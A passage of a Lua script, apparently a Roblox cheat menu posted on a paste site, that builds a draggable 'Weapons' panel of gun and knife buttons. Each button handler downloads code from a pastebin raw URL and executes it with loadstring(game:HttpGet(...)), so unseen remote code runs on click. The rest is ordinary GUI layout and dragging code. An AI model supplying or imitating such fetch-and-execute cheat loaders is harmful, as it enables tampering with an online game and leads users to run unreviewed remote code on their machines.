  699. Buttons.Parent = Weapons
  700. Buttons.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  701. Buttons.BackgroundTransparency = 1.000
  702. Buttons.BorderSizePixel = 0
  703. Buttons.Position = UDim2.new(0.858490586, 0, 0.0228571445, 0)
  704. Buttons.Size = UDim2.new(0, 23, 0, 256)
  705.  
  706. QuickscoperGun.Name = "Quickscoper Gun"
  707. QuickscoperGun.Parent = Buttons
  708. QuickscoperGun.BackgroundColor3 = Color3.fromRGB(170, 0, 0)
  709. QuickscoperGun.BorderSizePixel = 0
  710. QuickscoperGun.Position = UDim2.new(-0.0434782617, 0, 0.0218978096, 0)
  711. QuickscoperGun.Size = UDim2.new(0, 22, 0, 21)
  712. QuickscoperGun.Font = Enum.Font.SourceSans
  713. QuickscoperGun.Text = ""
  714. QuickscoperGun.TextColor3 = Color3.fromRGB(0, 0, 0)
  715. QuickscoperGun.TextScaled = true
  716. QuickscoperGun.TextSize = 14.000
  717. QuickscoperGun.TextWrapped = true
  718.  
  719. WeaponLayout.Name = "Weapon Layout"
  720. WeaponLayout.Parent = Buttons
  721. WeaponLayout.SortOrder = Enum.SortOrder.LayoutOrder
  722. WeaponLayout.Padding = UDim.new(0, 8)
  723.  
  724. TeslaGun.Name = "Tesla Gun"
  725. TeslaGun.Parent = Buttons
  726. TeslaGun.BackgroundColor3 = Color3.fromRGB(170, 0, 0)
  727. TeslaGun.BorderSizePixel = 0
  728. TeslaGun.Position = UDim2.new(-0.0434782617, 0, 0.0218978096, 0)
  729. TeslaGun.Size = UDim2.new(0, 22, 0, 21)
  730. TeslaGun.Font = Enum.Font.SourceSans
  731. TeslaGun.Text = ""
  732. TeslaGun.TextColor3 = Color3.fromRGB(0, 0, 0)
  733. TeslaGun.TextScaled = true
  734. TeslaGun.TextSize = 14.000
  735. TeslaGun.TextWrapped = true
  736.  
  737. MLGGun.Name = "MLG Gun"
  738. MLGGun.Parent = Buttons
  739. MLGGun.BackgroundColor3 = Color3.fromRGB(170, 0, 0)
  740. MLGGun.BorderSizePixel = 0
  741. MLGGun.Position = UDim2.new(-0.0434782617, 0, 0.0218978096, 0)
  742. MLGGun.Size = UDim2.new(0, 22, 0, 21)
  743. MLGGun.Font = Enum.Font.SourceSans
  744. MLGGun.Text = ""
  745. MLGGun.TextColor3 = Color3.fromRGB(0, 0, 0)
  746. MLGGun.TextScaled = true
  747. MLGGun.TextSize = 14.000
  748. MLGGun.TextWrapped = true
  749.  
  750. MidasTouchGun.Name = "Midas Touch Gun"
  751. MidasTouchGun.Parent = Buttons
  752. MidasTouchGun.BackgroundColor3 = Color3.fromRGB(170, 0, 0)
  753. MidasTouchGun.BorderSizePixel = 0
  754. MidasTouchGun.Position = UDim2.new(-0.0434782617, 0, 0.0218978096, 0)
  755. MidasTouchGun.Size = UDim2.new(0, 22, 0, 21)
  756. MidasTouchGun.Font = Enum.Font.SourceSans
  757. MidasTouchGun.Text = ""
  758. MidasTouchGun.TextColor3 = Color3.fromRGB(0, 0, 0)
  759. MidasTouchGun.TextScaled = true
  760. MidasTouchGun.TextSize = 14.000
  761. MidasTouchGun.TextWrapped = true
  762.  
  763. IlluminatiGun.Name = "Illuminati Gun"
  764. IlluminatiGun.Parent = Buttons
  765. IlluminatiGun.BackgroundColor3 = Color3.fromRGB(170, 0, 0)
  766. IlluminatiGun.BorderSizePixel = 0
  767. IlluminatiGun.Position = UDim2.new(-0.0434782617, 0, 0.0829665139, 0)
  768. IlluminatiGun.Size = UDim2.new(0, 22, 0, 21)
  769. IlluminatiGun.Font = Enum.Font.SourceSans
  770. IlluminatiGun.Text = ""
  771. IlluminatiGun.TextColor3 = Color3.fromRGB(0, 0, 0)
  772. IlluminatiGun.TextScaled = true
  773. IlluminatiGun.TextSize = 14.000
  774. IlluminatiGun.TextWrapped = true
  775.  
  776. IlluminatiKnife.Name = "Illuminati Knife"
  777. IlluminatiKnife.Parent = Buttons
  778. IlluminatiKnife.BackgroundColor3 = Color3.fromRGB(170, 0, 0)
  779. IlluminatiKnife.BorderSizePixel = 0
  780. IlluminatiKnife.Position = UDim2.new(-0.0434782617, 0, 0.0218978096, 0)
  781. IlluminatiKnife.Size = UDim2.new(0, 22, 0, 21)
  782. IlluminatiKnife.Font = Enum.Font.SourceSans
  783. IlluminatiKnife.Text = ""
  784. IlluminatiKnife.TextColor3 = Color3.fromRGB(0, 0, 0)
  785. IlluminatiKnife.TextScaled = true
  786. IlluminatiKnife.TextSize = 14.000
  787. IlluminatiKnife.TextWrapped = true
  788.  
  789. QuickscoperKnife.Name = "Quickscoper Knife"
  790. QuickscoperKnife.Parent = Buttons
  791. QuickscoperKnife.BackgroundColor3 = Color3.fromRGB(170, 0, 0)
  792. QuickscoperKnife.BorderSizePixel = 0
  793. QuickscoperKnife.Position = UDim2.new(-0.0434782617, 0, 0.0218978096, 0)
  794. QuickscoperKnife.Size = UDim2.new(0, 22, 0, 21)
  795. QuickscoperKnife.Font = Enum.Font.SourceSans
  796. QuickscoperKnife.Text = ""
  797. QuickscoperKnife.TextColor3 = Color3.fromRGB(0, 0, 0)
  798. QuickscoperKnife.TextScaled = true
  799. QuickscoperKnife.TextSize = 14.000
  800. QuickscoperKnife.TextWrapped = true
  801.  
  802. MLGKnife.Name = "MLG Knife"
  803. MLGKnife.Parent = Buttons
  804. MLGKnife.BackgroundColor3 = Color3.fromRGB(170, 0, 0)
  805. MLGKnife.BorderSizePixel = 0
  806. MLGKnife.Position = UDim2.new(-0.0434782617, 0, 0.0218978096, 0)
  807. MLGKnife.Size = UDim2.new(0, 22, 0, 21)
  808. MLGKnife.Font = Enum.Font.SourceSans
  809. MLGKnife.Text = ""
  810. MLGKnife.TextColor3 = Color3.fromRGB(0, 0, 0)
  811. MLGKnife.TextScaled = true
  812. MLGKnife.TextSize = 14.000
  813. MLGKnife.TextWrapped = true
  814.  
  815. MidasTouchKnife.Name = "Midas Touch Knife"
  816. MidasTouchKnife.Parent = Buttons
  817. MidasTouchKnife.BackgroundColor3 = Color3.fromRGB(170, 0, 0)
  818. MidasTouchKnife.BorderSizePixel = 0
  819. MidasTouchKnife.Position = UDim2.new(-0.0434782617, 0, 0.0218978096, 0)
  820. MidasTouchKnife.Size = UDim2.new(0, 22, 0, 21)
  821. MidasTouchKnife.Font = Enum.Font.SourceSans
  822. MidasTouchKnife.Text = ""
  823. MidasTouchKnife.TextColor3 = Color3.fromRGB(0, 0, 0)
  824. MidasTouchKnife.TextScaled = true
  825. MidasTouchKnife.TextSize = 14.000
  826. MidasTouchKnife.TextWrapped = true
  827.  
  828. WeaponPadding.Name = "Weapon Padding"
  829. WeaponPadding.Parent = Buttons
  830. WeaponPadding.PaddingBottom = UDim.new(0, 5)
  831.  
  832. TeslaKnife.Name = "Tesla Knife"
  833. TeslaKnife.Parent = Buttons
  834. TeslaKnife.BackgroundColor3 = Color3.fromRGB(170, 0, 0)
  835. TeslaKnife.BorderSizePixel = 0
  836. TeslaKnife.Position = UDim2.new(-0.0434782617, 0, 0.0218978096, 0)
  837. TeslaKnife.Size = UDim2.new(0, 22, 0, 21)
  838. TeslaKnife.Font = Enum.Font.SourceSans
  839. TeslaKnife.Text = ""
  840. TeslaKnife.TextColor3 = Color3.fromRGB(0, 0, 0)
  841. TeslaKnife.TextScaled = true
  842. TeslaKnife.TextSize = 14.000
  843. TeslaKnife.TextWrapped = true
  844.  
  845. UpDownW.Name = "Up & Down W"
  846. UpDownW.Parent = Weapons
  847. UpDownW.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  848. UpDownW.BackgroundTransparency = 1.000
  849. UpDownW.BorderSizePixel = 0
  850. UpDownW.Position = UDim2.new(0.886792481, 0, -0.055555556, 0)
  851. UpDownW.Rotation = 90.000
  852. UpDownW.Size = UDim2.new(0, 18, 0, 13)
  853. UpDownW.Font = Enum.Font.SourceSansBold
  854. UpDownW.Text = ">"
  855. UpDownW.TextColor3 = Color3.fromRGB(255, 255, 255)
  856. UpDownW.TextScaled = true
  857. UpDownW.TextSize = 14.000
  858. UpDownW.TextWrapped = true
  859. UpDownW.MouseButton1Click:connect(function()
  860. if Minimized then
  861. Weapons:TweenSize(UDim2.new(0, 212,0, 2), "InOut", "Quart", 1.5)
  862. Buttons.Visible = false
  863. Menu.Visible = false
  864. UpDownW.Text = "<"
  865. else
  866. Weapons:TweenSize(UDim2.new(0, 212,0, 297), "Out", "Quart", 1.5)
  867. wait(1.6)
  868. Buttons.Visible = true
  869. Menu.Visible = true
  870. UpDownW.Text = ">"
  871. end
  872. end)
  873.  
  874. QuickscoperGun.MouseButton1Click:connect(
  875. function()
  876. QuickscoperGun.BackgroundColor3 = Color3.fromRGB(0, 255, 0)
  877. loadstring(game:HttpGet(("https://pastebin.com/raw/MJKqpuVE"), true))()
  878. end
  879. )
  880. QuickscoperKnife.MouseButton1Click:connect(
  881. function()
  882. QuickscoperKnife.BackgroundColor3 = Color3.fromRGB(0, 255, 0)
  883. loadstring(game:HttpGet(("https://pastebin.com/raw/VRcYrUch"), true))()
  884. end
  885. )
  886. IlluminatiGun.MouseButton1Click:connect(
  887. function()
  888. IlluminatiGun.BackgroundColor3 = Color3.fromRGB(0, 255, 0)
  889. loadstring(game:HttpGet(("https://pastebin.com/raw/Rw5Jky9D"), true))()
  890. end
  891. )
  892. IlluminatiKnife.MouseButton1Click:connect(
  893. function()
  894. IlluminatiKnife.BackgroundColor3 = Color3.fromRGB(0, 255, 0)
  895. loadstring(game:HttpGet(("https://pastebin.com/raw/3b3M9kph"), true))()
  896. end
  897. )
  898. TeslaGun.MouseButton1Click:connect(
  899. function()
  900. TeslaGun.BackgroundColor3 = Color3.fromRGB(0, 255, 0)
  901. loadstring(game:HttpGet(("https://pastebin.com/raw/AFAaZh42"), true))()
  902. end
  903. )
  904. TeslaKnife.MouseButton1Click:connect(
  905. function()
  906. TeslaKnife.BackgroundColor3 = Color3.fromRGB(0, 255, 0)
  907. loadstring(game:HttpGet(("https://pastebin.com/raw/s6yeFjTK"), true))()
  908. end
  909. )
  910. MidasTouchGun.MouseButton1Click:connect(
  911. function()
  912. MidasTouchGun.BackgroundColor3 = Color3.fromRGB(0, 255, 0)
  913. loadstring(game:HttpGet(("https://pastebin.com/raw/Rw5Jky9D"), true))()
  914. end
  915. )
  916. MidasTouchKnife.MouseButton1Click:connect(
  917. function()
  918. MidasTouchKnife.BackgroundColor3 = Color3.fromRGB(0, 255, 0)
  919. loadstring(game:HttpGet(("https://pastebin.com/raw/szPGszUG"), true))()
  920. end
  921. )
  922. MLGGun.MouseButton1Click:connect(
  923. function()
  924. MLGGun.BackgroundColor3 = Color3.fromRGB(0, 255, 0)
  925. loadstring(game:HttpGet(("https://pastebin.com/raw/"), true))()
  926. end
  927. )
  928. MLGKnife.MouseButton1Click:connect(
  929. function()
  930. MLGKnife.BackgroundColor3 = Color3.fromRGB(0, 255, 0)
  931. loadstring(game:HttpGet(("https://pastebin.com/raw/"), true))()
  932. end
  933. )
  934.  
  935. function dragGUI(gui)
  936. spawn(
  937. function()
  938. local dragging
  939. local dragInput
  940. local dragStart
  941. local startPos
  942. local function update(input)
  943. local delta = input.Position - dragStart
  944. gui:TweenPosition(
  945. UDim2.new(
  946. startPos.X.Scale,
  947. startPos.X.Offset + delta.X,
  948. startPos.Y.Scale,
  949. startPos.Y.Offset + delta.Y
  950. ),
  951. "InOut",
  952. "Quart",
  953. 0.04,
  954. true,
  955. nil
  956. )
  957. end
  958. gui.InputBegan:Connect(
  959. function(input)
  960. if
  961. input.UserInputType == Enum.UserInputType.MouseButton1 or
  962. input.UserInputType == Enum.UserInputType.Touch
  963. then
  964. dragging = true
  965. dragStart = input.Position
  966. startPos = gui.Position
  967.  
  968. input.Changed:Connect(
  969. function()
  970. if input.UserInputState == Enum.UserInputState.End then
  971. dragging = false
  972. end
  973. end
  974. )
  975. end
  976. end
  977. )
  978. gui.InputChanged:Connect(
  979. function(input)
  980. if
  981. input.UserInputType == Enum.UserInputType.MouseMovement or
  982. input.UserInputType == Enum.UserInputType.Touch
  983. then
  984. dragInput = input
  985. end
  986. end
  987. )
  988. UserInputService.InputChanged:Connect(
  989. function(input)
  990. if input == dragInput and dragging then
  991. update(input)
  992. end
  993. end
  994. )
  995. end
  996. )
  997. end
  998.  
  999. dragGUI(Window)
  1000. dragGUI(Weapons)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement